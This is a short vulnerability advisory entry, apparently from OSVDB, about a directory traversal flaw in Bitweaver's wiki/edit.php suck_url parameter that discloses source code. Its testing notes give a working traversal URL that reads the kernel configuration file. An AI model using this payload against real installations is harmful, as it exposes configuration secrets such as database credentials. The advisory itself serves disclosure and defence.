Bitweaver wiki/edit.php suck_url Variable Traversal Source Code Disclosure

2007-12-30T00:00:00
ID OSVDB:39915
Type osvdb
Reporter OSVDB
Modified 2007-12-30T00:00:00

Description

Manual Testing Notes

http://[target]/bitweaver/wiki/edit.php?page=SandBox&suck_url=./../kernel/config_inc.php&do_suck=h

References:

Secunia Advisory ID:28300 Other Advisory URL: http://www.bugreport.ir/?/24 ISS X-Force ID: 39322 Generic Exploit URL: http://www.milw0rm.com/exploits/4814 CVE-2007-6651 Bugtraq ID: 27081